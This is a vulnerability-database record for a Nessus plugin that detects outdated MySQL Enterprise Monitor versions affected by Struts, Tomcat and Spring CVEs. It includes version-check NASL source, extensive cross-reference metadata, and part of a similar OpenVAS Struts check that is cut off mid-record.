MySQL Enterprise Monitor 3.4.x < 3.4.10 / 4.x < 4.0.7 / 8.x < 8.0.3 Multiple Vulnerabilities (Oct 2018 CPU)

2020-07-24T00:00:00

Description

According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the following vulnerabilities in its subcomponents: - Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace. (CVE-2018-11776) - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014) - Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. (CVE-2018-1258) Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.

{"id": "MYSQL_ENTERPRISE_MONITOR_8_0_3.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "MySQL Enterprise Monitor 3.4.x < 3.4.10 / 4.x < 4.0.7 / 8.x < 8.0.3 Multiple Vulnerabilities (Oct 2018 CPU)", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the following vulnerabilities in its subcomponents:\n\n - Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace. (CVE-2018-11776)\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014)\n\n - Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. (CVE-2018-1258)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "published": "2020-07-24T00:00:00", "modified": "2023-04-25T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/138901", "reporter": "This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8014", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1258", "https://www.oracle.com/security-alerts/cpuoct2018.html"], "cvelist": ["CVE-2018-11776", "CVE-2018-1258", "CVE-2018-8014"], "immutableFields": [], "lastseen": "2023-10-06T15:11:50", "viewCount": 42, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:23A2DE4EE8CE0AE43558095CBB5694B1"]}, {"type": "almalinux", "idList": ["ALSA-2019:1529"]}, {"type": "amazon", "idList": ["ALAS-2018-1055", "ALAS-2018-1056", "ALAS2-2020-1402"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486"]}, {"type": "centos", "idList": ["CESA-2019:2205"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0849"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2018-11776"]}, {"type": "cisco", "idList": ["CISCO-SA-20180823-APACHE-STRUTS"]}, {"type": "cve", "idList": ["CVE-2018-11776", "CVE-2018-1258", "CVE-2018-8014"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1400-1:35C3A", "DEBIAN:DLA-1400-1:B4EC8", "DEBIAN:DLA-1883-1:3E939", "DEBIAN:DSA-4596-1:D180A"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-8014"]}, {"type": "dsquare", "idList": ["E-666"]}, {"type": "exploitdb", "idList": ["EDB-ID:45260", "EDB-ID:45367"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE"]}, {"type": "f5", "idList": ["F5:K11420556", "F5:K18193959", "F5:K60499474"]}, {"type": "fedora", "idList": ["FEDORA:64CD76075F16", "FEDORA:6BF9F60769FE"]}, {"type": "fireeye", "idList": ["FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "github", "idList": ["GHSA-CR6J-3JP9-RW65", "GHSA-CXRJ-66C5-9FMH", "GHSA-R4X2-3CQ5-HQVP", "GITHUB:0519EA92487B44F364A1B35C85049455"]}, {"type": "githubexploit", "idList": ["3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "CD8CABD7-BE65-5434-B682-F73ABA737C65"]}, {"type": "ibm", "idList": ["20D334DF630C3C7B5490CC97E9EB2E76B4108FD56753DB19039AF6E0DE79CB63", "47D48C5A9F3802E168F3775B67FEF0A4B25692C1BE0EB29698F35ECDF8F0CD7B", "48E2F14694E188398670F80EC3BDC38DA8366A97A8AABAF5E6501E5BCF31228E", "709EFBBA0822EBB77C07CD194232C954374F9FDFBE66E10E5A72224A58470EAA", "7C42BBDFFC97D2C8E3BEC4BE79A23F40E78C2650B91FD356C831E42D0B7EE5EF", "8D92F3D2DF6A11349A2815C9DBFEE8CEFA4D5B034DC3477EAF30879571A440D4", "9304092E63FBA16253D493D2E1E4C422EF1498D05C9ADDCBBA838C3C29B1EF87", "B236D3400A0C6106EC62C77931DC3654EEBAB6EEA563B3344ECFF477FD634E81", "B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0", "BF4651008A331C7D796A1E09F830D542352CF251871DBEED396D2CE654058F5A", "C596338966F1610A28DC01FBB21502CC71651B70DBC8B96D9603EBE432E4D5E6", "EF22A73E167DAD8921F1B5310AD0D0D34493E613208B9FFE7D6DF59B309A1D62"]}, {"type": "ics", "idList": ["ICSMA-21-187-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:E9D83907E76B2B468512918F211FB65E", "IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8"]}, {"type": "kaspersky", "idList": ["KLA11256"]}, {"type": "kitploit", "idList": ["KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:8708017483803645203"]}, {"type": "krebs", "idList": ["KREBS:B3A2371A1AB31AB3CE2E3F1B2243FDC6"]}, {"type": "mageia", "idList": ["MGASA-2018-0479"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-STRUTS2_NAMESPACE_OGNL-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891264", "MYHACK58:62201891267", "MYHACK58:62201993410", "MYHACK58:62201993737"]}, {"type": "nessus", "idList": ["700689.PASL", "700695.PASL", "700707.PASL", "700708.PASL", "AL2_ALAS-2020-1402.NASL", "ALA_ALAS-2018-1055.NASL", "ALA_ALAS-2018-1056.NASL", "CENTOS8_RHSA-2019-1529.NASL", "CENTOS_RHSA-2019-2205.NASL", "CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "DEBIAN_DLA-1883.NASL", "DEBIAN_DSA-4596.NASL", "EULEROS_SA-2018-1220.NASL", "EULEROS_SA-2018-1227.NASL", "FEDORA_2018-B1832101B8.NASL", "OPENSUSE-2018-1019.NASL", "OPENSUSE-2018-1129.NASL", "OPENSUSE-2019-770.NASL", "ORACLELINUX_ELSA-2019-1529.NASL", "ORACLELINUX_ELSA-2019-2205.NASL", "ORACLE_ENTERPRISE_MANAGER_APR_2019_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2019_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2020_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_APR_2019_CPU.NASL", "ORACLE_GOLDENGATE_FOR_BIG_DATA_CPU_OCT_2018.NASL", "ORACLE_OATS_CPU_JAN_2019.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2019.NASL", "PHOTONOS_PHSA-2018-1_0-0154.NASL", "PHOTONOS_PHSA-2018-2_0-0065.NASL", "REDHAT-RHSA-2018-2469.NASL", "REDHAT-RHSA-2019-0451.NASL", "REDHAT-RHSA-2019-1529.NASL", "REDHAT-RHSA-2019-2205.NASL", "SL_20190806_TOMCAT_ON_SL7_X.NASL", "STRUTS_2_5_17.NASL", "STRUTS_2_5_17_RCE.NASL", "TOMCAT_7_0_89.NASL", "TOMCAT_8_0_53.NASL", "TOMCAT_8_5_32.NASL", "TOMCAT_9_0_9.NASL", "UBUNTU_USN-3665-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108792", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310704596", "OPENVAS:1361412562310813378", "OPENVAS:1361412562310813786", "OPENVAS:1361412562310843539", "OPENVAS:1361412562310851897", "OPENVAS:1361412562310852045", "OPENVAS:1361412562310875012", "OPENVAS:1361412562310875539", "OPENVAS:1361412562310891883", "OPENVAS:1361412562311220181220", "OPENVAS:1361412562311220181227"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2019", "ORACLE:CPUAPR2020", "ORACLE:CPUJAN2019", "ORACLE:CPUJAN2020", "ORACLE:CPUJAN2021", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2019", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2018", "ORACLE:CPUOCT2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-1529", "ELSA-2019-2205"]}, {"type": "osv", "idList": ["OSV:DLA-1400-1", "OSV:DLA-1400-2", "OSV:DLA-1883-1", "OSV:DSA-4596-1", "OSV:GHSA-CR6J-3JP9-RW65", "OSV:GHSA-CXRJ-66C5-9FMH", "OSV:GHSA-R4X2-3CQ5-HQVP"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149086", "PACKETSTORM:149087", "PACKETSTORM:149277"]}, {"type": "photon", "idList": ["PHSA-2018-0065", "PHSA-2018-0154", "PHSA-2018-1.0-0154", "PHSA-2018-2.0-0065"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "QUALYSBLOG:5E5409E093DE06FE967B988870D82540"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085"]}, {"type": "redhat", "idList": ["RHSA-2018:2469", "RHSA-2018:2470", "RHSA-2018:3768", "RHSA-2019:0450", "RHSA-2019:0451", "RHSA-2019:1529", "RHSA-2019:2205", "RHSA-2019:2413"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-11776", "RH:CVE-2018-1258", "RH:CVE-2018-8014"]}, {"type": "rocky", "idList": ["RLSA-2019:1529"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:2740-1", "OPENSUSE-SU-2018:3054-1"]}, {"type": "symantec", "idList": ["SMNTC-104222", "SMNTC-1463"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EAA71FE2CFAB05696E23A5F67435416C"]}, {"type": "thn", "idList": ["THN:72352D205E5586C5585536F8661A10E4", "THN:7FD924637D99697D78D53283817508DA", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:EF08CCF54E69481550D84949A563BAD5"]}, {"type": "threatpost", "idList": ["THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "THREATPOST:0FC293825070B81036932BDB41D793B5", "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "THREATPOST:2F30C320035805DB537579B86877517E", "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E984089A4842B564B374B807AF915A44", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "tomcat", "idList": ["TOMCAT:15BD868F3B05972CB1A45C65508CE8A7", "TOMCAT:19DF5AAB3C67D0C43C1BB8ACA9B2D28A", "TOMCAT:79D3367A4A503772BFF81DAA100293B0", "TOMCAT:F6F7ED16C563B059B962D4FE1AF6BBAB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F79486D4EB7A8032A33EF8200A559E62"]}, {"type": "ubuntu", "idList": ["USN-3665-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-11776", "UB:CVE-2018-1258", "UB:CVE-2018-8014"]}, {"type": "veracode", "idList": ["VERACODE:13001", "VERACODE:6270", "VERACODE:6315", "VERACODE:7342"]}, {"type": "zdt", "idList": ["1337DAY-ID-30956", "1337DAY-ID-30965", "1337DAY-ID-30966", "1337DAY-ID-31056"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:23A2DE4EE8CE0AE43558095CBB5694B1"]}, {"type": "amazon", "idList": ["ALAS-2018-1055", "ALAS-2018-1056", "ALAS2-2020-1402"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037"]}, {"type": "centos", "idList": ["CESA-2019:2205"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0849"]}, {"type": "cisco", "idList": ["CISCO-SA-20180823-APACHE-STRUTS"]}, {"type": "cve", "idList": ["CVE-2018-11776", "CVE-2018-1258", "CVE-2018-8014"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1400-1:35C3A"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-8014"]}, {"type": "dsquare", "idList": ["E-666"]}, {"type": "exploitdb", "idList": ["EDB-ID:45260"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE"]}, {"type": "f5", "idList": ["F5:K18193959", "F5:K60499474"]}, {"type": "fedora", "idList": ["FEDORA:64CD76075F16", "FEDORA:6BF9F60769FE"]}, {"type": "fireeye", "idList": ["FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "github", "idList": ["GHSA-CR6J-3JP9-RW65", "GHSA-CXRJ-66C5-9FMH", "GHSA-R4X2-3CQ5-HQVP"]}, {"type": "githubexploit", "idList": ["B41082A1-4177-53E2-A74C-8ABA13AA3E86"]}, {"type": "ibm", "idList": ["B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:E9D83907E76B2B468512918F211FB65E"]}, {"type": "kaspersky", "idList": ["KLA11256"]}, {"type": "kitploit", "idList": ["KITPLOIT:8708017483803645203"]}, {"type": "krebs", "idList": ["KREBS:B3A2371A1AB31AB3CE2E3F1B2243FDC6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS2_NAMESPACE_OGNL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891267"]}, {"type": "nessus", "idList": ["CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "FEDORA_2018-B1832101B8.NASL", "MYSQL_ENTERPRISE_MONITOR_WEB_DETECT.NASL", "OPENSUSE-2018-1019.NASL", "OPENSUSE-2018-1129.NASL", "PHOTONOS_PHSA-2018-1_0-0154.NASL", "PHOTONOS_PHSA-2018-2_0-0065.NASL", "REDHAT-RHSA-2018-2469.NASL", "STRUTS_2_5_17.NASL", "UBUNTU_USN-3665-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813378", "OPENVAS:1361412562310813786", "OPENVAS:1361412562310851897", "OPENVAS:1361412562310875012"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-1529", "ELSA-2019-2205"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149086", "PACKETSTORM:149087", "PACKETSTORM:149277"]}, {"type": "photon", "idList": ["PHSA-2018-1.0-0154", "PHSA-2018-2.0-0065"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "QUALYSBLOG:5E5409E093DE06FE967B988870D82540"]}, {"type": "redhat", "idList": ["RHSA-2019:2413"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-11776", "RH:CVE-2018-1258", "RH:CVE-2018-8014"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:2740-1", "OPENSUSE-SU-2018:3054-1"]}, {"type": "symantec", "idList": ["SMNTC-1463"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EAA71FE2CFAB05696E23A5F67435416C"]}, {"type": "thn", "idList": ["THN:72352D205E5586C5585536F8661A10E4", "THN:89C2482FECD181DD37C6DAEEB7A66FA9"]}, {"type": "threatpost", "idList": ["THREATPOST:2F30C320035805DB537579B86877517E", "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "tomcat", "idList": ["TOMCAT:19DF5AAB3C67D0C43C1BB8ACA9B2D28A"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F79486D4EB7A8032A33EF8200A559E62"]}, {"type": "ubuntu", "idList": ["USN-3665-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-1258", "UB:CVE-2018-8014"]}, {"type": "zdt", "idList": ["1337DAY-ID-30956", "1337DAY-ID-30965", "1337DAY-ID-30966", "1337DAY-ID-31056"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-11776", "epss": 0.97556, "percentile": 0.99994, "modified": "2023-05-07"}, {"cve": "CVE-2018-1258", "epss": 0.0046, "percentile": 0.71678, "modified": "2023-05-07"}, {"cve": "CVE-2018-8014", "epss": 0.14402, "percentile": 0.94884, "modified": "2023-05-07"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1696605202, "score": 1698839776, "epss": 0}, "_internal": {"score_hash": "0abf866415c0db04625c9cf270c74adf"}, "pluginID": "138901", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138901);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2018-1258\", \"CVE-2018-8014\", \"CVE-2018-11776\");\n script_bugtraq_id(\n 104203,\n 104222,\n 104530,\n 105125,\n 105538\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"MySQL Enterprise Monitor 3.4.x < 3.4.10 / 4.x < 4.0.7 / 8.x < 8.0.3 Multiple Vulnerabilities (Oct 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"MySQL Enterprise Monitor running on the remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the\nfollowing vulnerabilities in its subcomponents:\n\n - Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when\n alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results\n are used with no namespace and in same time, its upper package have no or wildcard namespace and similar\n to results, same possibility when using url tag which doesn't have value and action set and in same time,\n its upper package have no or wildcard namespace. (CVE-2018-11776)\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It\n is expected that users of the CORS filter will have configured it appropriately for their environment\n rather than using it in the default configuration. Therefore, it is expected that most users will not be\n impacted by this issue. (CVE-2018-8014)\n\n - Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an\n authorization bypass when using method security. An unauthorized malicious user can gain unauthorized\n access to methods that should be restricted. (CVE-2018-1258)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuoct2018.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.4.10, 4.0.7, 8.0.3 or later as referenced in the Oracle security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'MySQL Enterprise Monitor';\nport = get_http_port(default:18443);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:true);\n\nconstraints = [\n {'min_version' : '3.4', 'fixed_version' : '3.4.10'},\n {'min_version' : '4.0', 'fixed_version' : '4.0.7'},\n {'min_version' : '8.0', 'fixed_version' : '8.0.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "solution": "Upgrade to MySQL Enterprise Monitor version 3.4.10, 4.0.7, 8.0.3 or later as referenced in the Oracle security advisory.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2018-11776", "vendor_cvss2": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "vendor_cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "vpr": {"risk factor": "High", "score": "8.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2018-10-15T00:00:00", "vulnerabilityPublicationDate": "2018-05-11T00:00:00", "exploitableWith": ["Elliot(Apache Struts 2 Multiple Tags Result Namespace Handling RCE)", "Metasploit(Apache Struts 2 Namespace Redirect OGNL Injection)"]}

{"openvas": [{"lastseen": "2019-05-29T18:33:27", "description": "This host is running Apache Struts and is\n prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813786", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813786", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813786\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-23 12:45:43 +0530 (Thu, 23 Aug 2018)\");\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057)\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions\n when namespace value isn't set for a result defined in underlying configurations\n and in same time, its upper action(s) configurations have no or wildcard\n namespace. Same possibility when using url tag which doesn't have value and\n action set and in same time, its upper action(s) configurations have no or\n wildcard namespace.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attacker to possibly conduct remote code on the affected application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34,\n and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or\n 2.5.17 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:appPort, exit_no_version:TRUE)) exit(0);\nappVer = infos['version'];\npath = infos['location'];\n\nif(version_in_range(version:appVer, test_version:\"2.3\", test_version2:\"2.3.34\")){\n fix = \"2.3.35\";\n}\nelse if(version_in_range(version:appVer, test_version:\"2.5\", test_version2:\"2.5.16\")){\n fix = \"2.5.17\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:appPort);\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": 